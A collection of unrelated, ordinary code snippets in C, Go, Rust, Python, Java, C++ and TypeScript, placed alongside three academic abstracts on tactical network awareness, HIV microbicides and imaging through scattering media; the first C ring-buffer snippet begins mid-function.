unsigned int idx) { unsigned long *ring = queue_obj->ring_2mb; unsigned long *prod_cons_array = queue_obj->ring_4kb; unsigned int real_idx = idx << 1; unsigned int LP_VAL = (unsigned int) prod_cons_array[real_idx + LOCAL_PRODUCER]; unsigned int RC_VAL = prod_cons_array[real_idx + REMOTE_CONSUMER]; unsigned int LOWER_BOUND = idx << MAX_ITEMS_ORDER; unsigned int UPPER_BOUND = LOWER_BOUND + MAX_ITEMS; unsigned int max_dist, num_elements, remaining_elements, new_bound_val; max_dist = (RC_VAL-(LP_VAL+1)) % MAX_ITEMS; num_elements = MIN(UPPER_BOUND-LP_VAL, total_elements); remaining_elements = total_elements - num_elements; new_bound_val = (unlikely(remaining_elements != 0)) ? LOWER_BOUND + remaining_elements : LP_VAL + num_elements; if (likely(total_elements <= max_dist)) { memcpy( (void *)(ring + LP_VAL), (void *)source, num_elements << 3); asm volatile ("mfence" ::: "memory"); if (unlikely(remaining_elements != 0)) { memcpy( (void *)(ring + LOWER_BOUND), (void *)((unsigned long)source + (num_elements << 3)), remaining_elements << 3); asm volatile ("mfence" ::: "memory"); ring[real_idx + REMOTE_PRODUCER] = prod_cons_array[real_idx + LOCAL_PRODUCER] = LOWER_BOUND + remaining_elements; } else { ring[real_idx + REMOTE_PRODUCER] = prod_cons_array[real_idx + LOCAL_PRODUCER] = LP_VAL + num_elements; } return total_elements; } return 0; } int s_variable_multi_dequeue(queue_object *queue_obj, void *source, unsigned int max_requested, unsigned int idx) { unsigned long *ring = queue_obj->ring_2mb; unsigned long *prod_cons_array = queue_obj->ring_4kb; unsigned int real_idx = idx << 1; //2x the idx value unsigned int LC_VAL = (unsigned int)ring[real_idx + LOCAL_CONSUMER]; unsigned int RP_VAL = ring[real_idx + REMOTE_PRODUCER]; unsigned int LOWER_BOUND = idx << MAX_ITEMS_ORDER; unsigned int UPPER_BOUND = LOWER_BOUND + MAX_ITEMS; unsigned int max_available, num_elements, remaining_elements, i = 0; #ifdef HOST_MODE asm volatile ("mfence" ::: "memory"); #endif max_available = (RP_VAL-LC_VAL) % MAX_ITEMS; if (likely(max_requested <= max_available)) { num_elements = MIN(UPPER_BOUND-LC_VAL, max_requested); remaining_elements = max_requested - num_elements; memcpy( (void *) source, (void *)(ring + LC_VAL), num_elements << 3); if (unlikely(remaining_elements != 0)) { memcpy((void *)((unsigned long)source + (num_elements << 3)), (void *)(ring + LOWER_BOUND), remaining_elements << 3); prod_cons_array[real_idx + REMOTE_CONSUMER] = ring[real_idx + LOCAL_CONSUMER] = LOWER_BOUND + remaining_elements; } else { prod_cons_array[real_idx + REMOTE_CONSUMER] = ring[real_idx + LOCAL_CONSUMER] = LC_VAL + num_elements; } return max_requested; } return 0; } long common_submit_task(void *opq, long task_length, void *task_buffer, int channel, int socket) { task_queue_opaque *opaque = opq; long ret; int burst_num, retries = 0; task_header th; // printf("submit task len %d, channel %d socket %d\n", task_length, channel, socket); th.total_bursts = ((task_length - 1) / BUFF_SIZE_BOUNDARY) + 1; th.payload_size = task_length; th.magic = MAGIC; do { ret = s_variable_multi_enqueue(opaque->tx_q_objs[socket], &th, NUM_ITEMS, channel); } while (ret != NUM_ITEMS); //&& (++retries <= MAX_RETRY)); // Start enqueing for (burst_num = 0; burst_num < th.total_bursts ; burst_num++) { do { ret = s_variable_multi_enqueue(opaque->tx_q_objs[socket], task_buffer + (burst_num * BUFF_SIZE_BOUNDARY), NUM_ITEMS, channel); } while (ret != NUM_ITEMS); //&& (++retries <= MAX_RETRY)); } return task_length; } long common_recv_task(void *opq, long *task_length, void *task_buffer, int channel, int socket) { task_queue_opaque *opaque = opq; int burst_num=0; //Later use round robin to find from which channel data needs to be acquired long ret; task_header th; assert(opaque && task_buffer); // printf("submit task len %d, channel %d socket %d\n", task_length, channel, socket); ret = s_variable_multi_dequeue(opaque->rx_q_objs[socket], &th, NUM_ITEMS, channel); if (ret != NUM_ITEMS) return -1; assert ((th.total_bursts != 0) && (th.payload_size != 0) && (th.magic == MAGIC)); *task_length = th.payload_size; // Start dequeing for (burst_num = 0; burst_num < th.total_bursts ; burst_num++) { do { ret = s_variable_multi_dequeue(opaque->rx_q_objs[socket], task_buffer + (burst_num * BUFF_SIZE_BOUNDARY), NUM_ITEMS, channel); } while (ret != NUM_ITEMS); } return 0; } long host_submit_task(void *opq, long task_length, void *task_buffer, int task_id) { task_queue_opaque *opaque = opq; int channel; int socket; assert(opaque && task_buffer && task_length); channel = task_id < 0 ? (opaque->next_submit_channel++) % MAX_CHANNELS : task_id % 10; if (channel == 0) opaque->next_submit_socket++; socket = task_id < 0 ? opaque->active_sockets[opaque->next_submit_socket % opaque->total_sockets] : task_id / 10; assert((channel < MAX_CHANNELS) && (socket < VCA_SOCKETS)); return common_submit_task(opq,task_length,task_buffer,channel,socket); } long host_recv_task(void *opq, long *task_length, void *task_buffer, int *task_id) { task_queue_opaque *opaque = opq; int channel,socket; int got_data; assert(opaque && task_buffer && task_length && task_id); do { channel = (opaque->next_recv_channel++) % MAX_CHANNELS; if (channel == 0) opaque->next_recv_socket++; socket = opaque->active_sockets[opaque->next_recv_socket % opaque->total_sockets]; assert((channel < MAX_CHANNELS) && (socket < VCA_SOCKETS)); *task_id = (socket * 10) + (channel); got_data = common_recv_task(opq,task_length,task_buffer,channel,socket); } while (got_data != 0); return got_data; } long vca_submit_task(void *opq, long task_length, void *task_buffer, int channel) { task_queue_opaque *opaque = opq; assert(opaque && task_buffer && task_length && (channel < MAX_CHANNELS)); return common_submit_task(opq,task_length,task_buffer,channel,0); } long vca_recv_task(void *opq, long *task_length, void *task_buffer, int channel) { task_queue_opaque *opaque = opq; int got_data = 0; assert(opaque && task_buffer && task_length && (channel < MAX_CHANNELS)); do { got_data = common_recv_task(opq,task_length,task_buffer,channel,0); } while (got_data != 0); return got_data; }
// findGcd returns greatest common division for any number of numbers. func findGcd(values ...int32) int32 { switch len(values) { case 0: return 0 case 1: return values[0] } res := values[0] for i := 1; i < len(values); i++ { res = gcd(res, values[i]) } return res }
/// Creates a new egui window. pub fn create_egui_window( &self, label: String, app: Box<dyn epi::App + Send>, native_options: epi::NativeOptions, ) -> Result<()> { let proxy = self.context.proxy.clone(); send_user_message( &self.context, Message::CreateGLWindow(label, app, native_options, proxy), )?; Ok(()) }
Evaluating the effectiveness of Situational Awareness dissemination in tactical mobile ad hoc networks Situational Awareness (SA) dissemination in tactical mobile ad hoc networks (MANETs) plays an essential role in command and control systems for military operations. This task is particularly difficult in highly dynamic and complex environments with strict resource constraints on mobile units. In this work we present a design of SA dissemination schemes based on the multipoint relay (MPR) technique. We implement the schemes on a simulation platform and investigate their effectiveness in a real-time manner using novel metrics focusing on the completeness and freshness of SA, as well as the network traffic overhead and local processing cost. Two mobile scenarios, including one that is based on the Reference Point Group Mobility model, are set up to simulate the real-world behavior of tactical MANETs. The MPR-based methods are compared against an alternative scheme, Opportunistic Situational Awareness Passing, where the simulations highlight tradeoffs and provide insight into selection of design parameters.
export {default as Day, Props as DayProps} from './Day'; export {default as Month, Props as MonthProps} from './Month'; export {default as Weekday, Props as WeekdayProps} from './Weekday';
/** * Delete user assistants. * * This function performs a `DELETE` to the `/users/{userId}/assistants` endpoint. * * Delete all assistants of the current user. For user-level apps, pass [the `me` value](https://marketplace.zoom.us/docs/api-reference/using-zoom-apis#mekeyword) instead of the `userId` parameter. * * Assistants are the users to whom the current user has assigned [scheduling privilege](https://support.zoom.us/hc/en-us/articles/201362803-Scheduling-Privilege). These assistants can schedule meeting on behalf of the current user as well as manage and act as an alternative host for all meetings if the admin has enabled [Co-host option](https://zoom.us/account/setting) on the account. * * **Scopes:** `user:write:admin`, `user:write`<br>**[Rate Limit Label](https://marketplace.zoom.us/docs/api-reference/rate-limits#rate-limits):** `Light` * * **Prerequisites:** * * The user as well as the assistant must have Licensed or an On-prem license. * * Assistants must be under the current user's account. * * **Parameters:** * * * `user_id: &str` -- The user ID or email address of the user. For user-level apps, pass `me` as the value for userId. */ pub async fn assistants_delete(&self, user_id: &str) -> Result<()> { let url = format!( "/users/{}/assistants", crate::progenitor_support::encode_path(&user_id.to_string()), ); self.client.delete(&url, None).await }
a = 1 b = 2 a = a + b b = a - b a = a - b print(a) print(b)
// +build !ignore_autogenerated // Copyright 2021 Red Hat, Inc. and/or its affiliates // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // Code generated by controller-gen. DO NOT EDIT. package v1 import ( runtime "k8s.io/apimachinery/pkg/runtime" ) // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *KogitoBuild) DeepCopyInto(out *KogitoBuild) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) in.Spec.DeepCopyInto(&out.Spec) in.Status.DeepCopyInto(&out.Status) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new KogitoBuild. func (in *KogitoBuild) DeepCopy() *KogitoBuild { if in == nil { return nil } out := new(KogitoBuild) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *KogitoBuild) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *KogitoBuildList) DeepCopyInto(out *KogitoBuildList) { *out = *in out.TypeMeta = in.TypeMeta in.ListMeta.DeepCopyInto(&out.ListMeta) if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]KogitoBuild, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new KogitoBuildList. func (in *KogitoBuildList) DeepCopy() *KogitoBuildList { if in == nil { return nil } out := new(KogitoBuildList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *KogitoBuildList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *KogitoInfra) DeepCopyInto(out *KogitoInfra) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) in.Spec.DeepCopyInto(&out.Spec) in.Status.DeepCopyInto(&out.Status) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new KogitoInfra. func (in *KogitoInfra) DeepCopy() *KogitoInfra { if in == nil { return nil } out := new(KogitoInfra) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *KogitoInfra) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *KogitoInfraList) DeepCopyInto(out *KogitoInfraList) { *out = *in out.TypeMeta = in.TypeMeta in.ListMeta.DeepCopyInto(&out.ListMeta) if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]KogitoInfra, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new KogitoInfraList. func (in *KogitoInfraList) DeepCopy() *KogitoInfraList { if in == nil { return nil } out := new(KogitoInfraList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *KogitoInfraList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *KogitoRuntime) DeepCopyInto(out *KogitoRuntime) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) in.Spec.DeepCopyInto(&out.Spec) in.Status.DeepCopyInto(&out.Status) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new KogitoRuntime. func (in *KogitoRuntime) DeepCopy() *KogitoRuntime { if in == nil { return nil } out := new(KogitoRuntime) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *KogitoRuntime) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *KogitoRuntimeList) DeepCopyInto(out *KogitoRuntimeList) { *out = *in out.TypeMeta = in.TypeMeta in.ListMeta.DeepCopyInto(&out.ListMeta) if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]KogitoRuntime, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new KogitoRuntimeList. func (in *KogitoRuntimeList) DeepCopy() *KogitoRuntimeList { if in == nil { return nil } out := new(KogitoRuntimeList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *KogitoRuntimeList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *KogitoSupportingService) DeepCopyInto(out *KogitoSupportingService) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) in.Spec.DeepCopyInto(&out.Spec) in.Status.DeepCopyInto(&out.Status) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new KogitoSupportingService. func (in *KogitoSupportingService) DeepCopy() *KogitoSupportingService { if in == nil { return nil } out := new(KogitoSupportingService) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *KogitoSupportingService) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *KogitoSupportingServiceList) DeepCopyInto(out *KogitoSupportingServiceList) { *out = *in out.TypeMeta = in.TypeMeta in.ListMeta.DeepCopyInto(&out.ListMeta) if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]KogitoSupportingService, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new KogitoSupportingServiceList. func (in *KogitoSupportingServiceList) DeepCopy() *KogitoSupportingServiceList { if in == nil { return nil } out := new(KogitoSupportingServiceList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *KogitoSupportingServiceList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil }
// RowCount returns the row count of model.Status entries. func (s *StatusRepository) RowCount() (int, error) { var count int64 s.db.Model(&model.Status{}).Count(&count) return int(count), nil }
import MomentUtils from '@date-io/moment' import { MuiPickersUtilsProvider, KeyboardTimePicker } from '@material-ui/pickers' import { makeStyles } from '@material-ui/core' import React from 'react' interface TimeProps { id: string label: string time: Date disabled: boolean onChange: (label: string, time: Date) => void } const useStyles = makeStyles(() => ({ timePicker: { width: 130, }, })) function SingleTime (props: TimeProps) { const classes = useStyles() const handleChange = (date: any) => { if (date && date.isValid()) { props.onChange(props.id, date.toDate()) } } return ( <MuiPickersUtilsProvider utils={MomentUtils}> <KeyboardTimePicker disabled={props.disabled} label={props.label} value={props.time} onChange={(date: any) => { handleChange(date) }} className={classes.timePicker} /> </MuiPickersUtilsProvider> ) } export default SingleTime
Making prevention public: The co-production of gender and technology in HIV prevention research This paper brings together the study of transnational flows in global health and the gendering of technological artefacts. It does so through a case study of vaginal microbicides for HIV prevention, which have commonly been advocated for as a tool for women’s empowerment in parts of the world where HIV is most prevalent, namely sub-Saharan Africa. Drawing on fieldwork in the UK and Zambia, I argue that there is nothing inherently gendered about this ‘woman-controlled’ technology. Combining the notions of scripting and ‘making things public’, I demonstrate the political nature of transnational technology design and testing in the field of sexual health. Rather than framing this in terms of ethical debates, as is frequently the case in studies about the ‘global South’, I ground the analysis in the scripting and de-scripting of technologies and users. By focusing on how things are made public in HIV prevention, I draw attention to the normative, transformative and political potentials of new technologies, such as microbicides, and discuss the implications for their therapeutic success.
<filename>options.cpp<gh_stars>0 #include "options.h" #include "handler.h" #include <dirent.h> #include <string> #include <vector> #include <iostream> #include <QtQuick> #include <algorithm> const std::string configDir = "/opt/etc/draft"; // Create options and add them to the screen. Options::Options(MainView* mainView, QGuiApplication* app) : mainView(mainView), optionsView(mainView->rootObject()->findChild<QQuickItem*>("optionsArea")), app(app) { std::vector<std::string> filenames; // If the config directory doesn't exist, // then print an error and stop. if(!Options::read_directory(configDir, filenames)) { Options::error("Failed to read directory - it does not exist."); return; } std::sort(filenames.begin(), filenames.end()); for(std::string f : filenames) { std::cout << "parsing file " << f << std::endl; QFile file((configDir + "/" + f).c_str()); if (!file.open(QIODevice::ReadOnly | QIODevice::Text)) { Options::error("Couldn't find the file " + f + "."); break; } QTextStream in(&file); OptionItem opt; while (!in.atEnd()) { std::string line = in.readLine().toStdString(); if(line.length() > 0) { size_t sep = line.find("="); if(sep != line.npos) { std::string lhs = line.substr(0,sep); std::string rhs = line.substr(sep+1); if (lhs == "name") opt.name = rhs; else if(lhs == "desc") opt.desc = rhs; else if(lhs == "imgFile") opt.imgFile = rhs; else if(lhs == "call") opt.call = rhs; else if(lhs == "term") opt.term = rhs; else std::cout << "ignoring unknown parameter \"" << line << "\" in file \"" << f << "\"" << std::endl; } } else { std::cout << "ignoring malformed line \"" << line << "\" in file \"" << f << "\"" << std::endl; } } if(opt.call == "" || opt.term == "") continue; createOption(opt, optionList.size()); optionList.push_back(opt); } } void Options::createOption(OptionItem &option, size_t index) { QQuickView* opt = new QQuickView(); opt->setSource(QDir(DEPLOYMENT_PATH).filePath("qml/MenuItem.qml")); opt->show(); QQuickItem* root = opt->rootObject(); root->setProperty("itemNumber", QVariant(index)); root->setParentItem(optionsView); root->setProperty("t_name",QVariant(option.name.c_str())); root->setProperty("t_desc",QVariant(option.desc.c_str())); root->setProperty("t_imgFile",QVariant(("file://"+configDir+"/icons/"+option.imgFile+".png").c_str())); QObject* mouseArea = root->children().at(0); Handler* handler = new Handler(option.call, option.term, app, mainView, mouseArea); root->children().at(0)->installEventFilter(handler); option.object = opt; option.handler = handler; } void Options::error(std::string text) { std::cout << "!! Error: " << text << std::endl; } // Stolen shamelessly from <NAME> bool Options::read_directory(const std::string name, std::vector<std::string>& filenames) { DIR* dirp = opendir(name.c_str()); if(dirp == nullptr) { return false; } struct dirent * dp; while ((dp = readdir(dirp)) != NULL) { std::string dn = dp->d_name; if(dn == "." || dn == ".."|| dn == "icons") continue; filenames.push_back(dn); } closedir(dirp); return true; }
export * from "fs/promises"; import { stat } from "fs/promises"; type PathLike = string | Buffer | URL; export async function exists(path: PathLike): Promise<boolean> { try { await stat(path); return true; } catch (e) { return false; } }
/** * Solve StringIndexOutOfBoundsException for some devices. * Without this, Selection.setSelection(...) will always return exception * and crashes the app. * * @param widget * @param buffer * @param event * @return <code>true</code> when the event is handles, <code>false</code> otherwise. */ @Override public boolean onTouchEvent(TextView widget, Spannable buffer, MotionEvent event) { return true; }
def print_multi_list(list_ch_info=None, sep=";"): if not list_ch_info or not isinstance(list_ch_info, (list, tuple)): print("Print information from a list of lists from multiple " "channels obtained from `ch_download_latest_multi`.") return False if len(list_ch_info) < 1: print("Empty list.") return False flat_list = [] for sublist in list_ch_info: if not sublist: flat_list.append(None) continue for item in sublist: if not item: flat_list.append(None) continue flat_list.append(item) n_items = len(flat_list) print("Summary of downloads") out_list = [] for it, item in enumerate(flat_list, start=1): out = "{:2d}/{:2d}".format(it, n_items) + f"{sep} " if not item: out += "empty item. Failure establishing server connection?" out_list.append(out) continue if "claim_id" in item: out += "{}".format(item["claim_id"]) + f"{sep} " out += "{:3d}/{:3d}".format(item["blobs_completed"], item["blobs_in_stream"]) + f"{sep} " out += '"{}"'.format(item["channel_name"]) out += f"{sep} " out += '"{}"'.format(item["claim_name"]) out_list.append(out) elif "error" in item: out_list.append(out + '"{}"'.format(item["error"])) else: out_list.append(out + "not downloaded") print("\n".join(out_list)) return True
/********************************************************************************** * linerarSearch() * This function performs a linear search on an integer array. The list array, * which has size elements, is searched for the number stored in value. If the * number is found, its array subscript is returned. Otherwise, -1 is returned. **********************************************************************************/ int SearchSort::linearSearch(int list[], int size, int value){ int index = 0; int position = -1; bool found = false; while (index < size && !found) { if (list[index] == value){ found = true; position = index; } index++; } return position; }
package handler import ( "context" "google.golang.org/protobuf/types/known/timestamppb" "github.com/indrasaputra/aptx/entity" aptxv1 "github.com/indrasaputra/aptx/proto/indrasaputra/aptx/v1" "github.com/indrasaputra/aptx/usecase" ) // AptxService handles HTTP/2 gRPC request for URL aptx. // It implements gRPC service server. type AptxService struct { aptxv1.UnimplementedAptxServiceServer creator usecase.CreateShortURL getter usecase.GetURL } // NewAptxService creates an instance of AptxService. func NewAptxService(creator usecase.CreateShortURL, getter usecase.GetURL) *AptxService { return &AptxService{ creator: creator, getter: getter, } } // ShortenURL handles HTTP/2 gRPC request similar to POST in HTTP/1.1. func (as *AptxService) ShortenURL(ctx context.Context, request *aptxv1.ShortenURLRequest) (*aptxv1.ShortenURLResponse, error) { if request == nil { return nil, entity.ErrEmptyURL() } url, cerr := as.creator.Create(ctx, request.GetOriginalUrl()) if cerr != nil { return nil, cerr } return createShortenURLResponseFromEntity(url), nil } // GetAllURL handles HTTP/2 gRPC request similar to GET in HTTP/1.1. // Its specific job is to get all available URLs in the system. func (as *AptxService) GetAllURL(ctx context.Context, request *aptxv1.GetAllURLRequest) (*aptxv1.GetAllURLResponse, error) { if request == nil { return nil, entity.ErrEmptyURL() } urls, err := as.getter.GetAll(context.Background()) if err != nil { return nil, err } return createGetAllURLResponseFromEntity(urls), nil } // StreamAllURL handles HTTP/2 gRPC request similar to GET in HTTP/1.1. // Its specific job is to get all available URLs in the system using stream. func (as *AptxService) StreamAllURL(request *aptxv1.StreamAllURLRequest, stream aptxv1.AptxService_StreamAllURLServer) error { urls, err := as.getter.GetAll(stream.Context()) if err != nil { return err } for _, url := range urls { resp := createStreamAllURLResponseFromEntity(url) if serr := stream.Send(resp); serr != nil { return entity.ErrInternal(serr.Error()) } } return nil } // GetURLDetail handles HTTP/2 gRPC request similar to GET in HTTP/1.1. // Its specific job is to get a detail of a single short URL. func (as *AptxService) GetURLDetail(ctx context.Context, request *aptxv1.GetURLDetailRequest) (*aptxv1.GetURLDetailResponse, error) { if request == nil { return nil, entity.ErrEmptyURL() } url, err := as.getter.GetByCode(ctx, request.GetCode()) if err != nil { return nil, err } return createGetURLDetailResponseFromEntity(url), nil } func createShortenURLResponseFromEntity(url *entity.URL) *aptxv1.ShortenURLResponse { return &aptxv1.ShortenURLResponse{ Url: createShortenerV1URL(url), } } func createGetAllURLResponseFromEntity(urls []*entity.URL) *aptxv1.GetAllURLResponse { res := &aptxv1.GetAllURLResponse{} for _, url := range urls { res.Urls = append(res.Urls, createShortenerV1URL(url)) } return res } func createStreamAllURLResponseFromEntity(url *entity.URL) *aptxv1.StreamAllURLResponse { return &aptxv1.StreamAllURLResponse{ Url: createShortenerV1URL(url), } } func createGetURLDetailResponseFromEntity(url *entity.URL) *aptxv1.GetURLDetailResponse { return &aptxv1.GetURLDetailResponse{ Url: createShortenerV1URL(url), } } func createShortenerV1URL(url *entity.URL) *aptxv1.URL { return &aptxv1.URL{ Code: url.Code, ShortUrl: url.ShortURL, OriginalUrl: url.OriginalURL, ExpiredAt: timestamppb.New(url.ExpiredAt), CreatedAt: timestamppb.New(url.CreatedAt), } }
def pack(self, directory, out_asar, unpackeds=tuple()): with open(out_asar, "wb") as out_asarfile: fileinfos = self.__dir_to_fileinfos(directory, unpackeds=unpackeds) json_header = json.dumps(fileinfos, sort_keys=True, separators=(',', ':')) json_header_bytes = json_header.encode('utf-8') header_string_size = len(json_header_bytes) data_size = 4 aligned_size = roundup(header_string_size, data_size) header_size = aligned_size + 8 header_object_size = aligned_size + data_size out_asarfile.seek(0) out_asarfile.write( struct.pack('<4I', data_size, header_size, header_object_size, header_string_size)) out_asarfile.write(json_header_bytes + b'\0' * (aligned_size - header_string_size)) baseoffset = roundup(header_string_size + 16, 4) for path, fileinfo in _walk_fileinfos(fileinfos, ignore_unpacked=True): with open(os.path.join(directory, path), 'rb') as fp: out_asarfile.seek(int(fileinfo['offset']) + baseoffset) out_asarfile.write(fp.read()) return hashlib.sha256(json_header_bytes).hexdigest()
Imaging through scattering medium from multiple speckle images using microlens array We propose and experimentally demonstrate a new method of seeing objects hidden in a scattering medium from multiple speckle images. The objects hidden between two biological tissues (chicken breast) are reconstructed from many speckled images formed by a microlens array. Each microlens from the array projects a small different speckle image of the hidden object onto a CCD camera. The entire set of noisy images from the array are digitally processed to obtain the desired image of the hidden objects. Following the first proposed method, a different algorithm implemented on the same optical system has been developed. This modified algorithm, based on the point-source reference method improves the resolution of the previous method. Laboratory experiments with two kinds of objects are presented.
import { platformBrowserDynamic } from '@angular/platform-browser-dynamic'; import { CdfModule } from './cdf.module'; platformBrowserDynamic().bootstrapModule(CdfModule);
<reponame>Greatpanc/mindspore_zhb<filename>mindspore/ccsrc/ps/core/cluster_config.h /** * Copyright 2021 Huawei Technologies Co., Ltd * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #ifndef MINDSPORE_CCSRC_PS_CORE_CLUSTER_CONFIG_H_ #define MINDSPORE_CCSRC_PS_CORE_CLUSTER_CONFIG_H_ #include <string> #include <iostream> #include <memory> #include <utility> #include "utils/log_adapter.h" namespace mindspore { namespace ps { namespace core { /* * Configuration information read through environment variables and configuration files, generally immutable */ struct ClusterConfig { explicit ClusterConfig(const uint32_t &worker_num, const uint32_t &server_num, std::string host, const uint16_t &port) : initial_worker_num(worker_num), initial_server_num(server_num), heartbeat_interval(3), scheduler_host(host), scheduler_port(port), heartbeat_timeout(30), cluster_available_timeout(300), connect_interval(3000), scheduler_timeout(30) {} // Configure through environment variables:MS_WORKER_NUM uint32_t initial_worker_num; // Configure through environment variables:MS_SERVER_NUM uint32_t initial_server_num; // The interval for sending heartbeat packets between worker node,server node and scheduler node is 3 seconds. uint32_t heartbeat_interval; std::string scheduler_host; uint16_t scheduler_port; // The timeout for worker node and server node sending heartbeat packets to scheduler node is 30 seconds. uint32_t heartbeat_timeout; // Timeout period for cluster preparation is 300 seconds. uint32_t cluster_available_timeout; // The timeout period for the client to connect to the server is 3000ms. uint32_t connect_interval; // When the scheduler exits, the worker and server can continue to work for 5 hours int64_t scheduler_timeout; }; } // namespace core } // namespace ps } // namespace mindspore #endif // MINDSPORE_CCSRC_PS_CORE_CLUSTER_CONFIG_H_
/** * Generates all permutations of 0 .. n-1 without repetition with order * * @author Dr. Matthias Laux */ public class Permutations { private int[][] permutations; private int resultIndex = 0; /** * Generates all permutations of 0 .. n-1 without repetition with order. The * results are collected in an integer array whose first dimension is equal * to n! which is the number of permutations. The second dimension of the * array contains the actual n permutation indexes * * @param n * @return */ public int[][] generate(int n) { int permutationCount = Tools.factorial(n); permutations = new int[permutationCount][n]; int[] d = new int[n]; for (int i = 0; i < n; i++) { d[i] = i; } return generate(d); } /** * * @param input * @return */ public int[][] generate(String input) { int[] d = new int[input.length()]; for (int i = 0; i < input.length(); i++) { d[i] = input.charAt(i); } return generate(d); } /** * * @param input * @return */ public int[][] generate(int[] input) { if (input == null) { throw new NullPointerException("input may not be null"); } int n = input.length; int permutationCount = Tools.factorial(n); permutations = new int[permutationCount][n]; permutate(new int[n], 0, input); return permutations; } /** * Recursively create the permutations based on the actual values in d[] * * @param resultCollector * @param resultCollectorIndex * @param permutableValues */ private void permutate(int[] resultCollector, int resultCollectorIndex, int[] permutableValues) { if (permutableValues.length > 0) { //.... There are permutable values left, start the next level of the recursion with them, reducing the permutable value list accordingly for (int i = 0; i < permutableValues.length; i++) { int[] nextResultCollector = Arrays.copyOf(resultCollector, resultCollector.length); nextResultCollector[resultCollectorIndex] = permutableValues[i]; permutate(nextResultCollector, resultCollectorIndex + 1, reduce(permutableValues, i)); } } else { //.... We have reached the end of a tree walk, story the assembled result in the global collector and increase the global index System.arraycopy(resultCollector, 0, permutations[resultIndex], 0, resultCollector.length); resultIndex++; } } /** * Create a new int[] from d[] while removing the entry at index k * * @param d * @param k * @return */ private int[] reduce(int[] d, int k) { int[] r = new int[d.length - 1]; int ind = 0; for (int i = 0; i < d.length; i++) { if (i != k) { r[ind++] = d[i]; } } return r; } }
// Called every time the scheduler runs while the command is scheduled. @Override public void execute() { m_IntakeSubsystem.IntakeIn(); m_IntakeSubsystem.MidtakeOn(); if(m_IntakeSubsystem.ballExist()){ m_LEDSubsystem.Lime(); } else{ m_LEDSubsystem.White(); } }
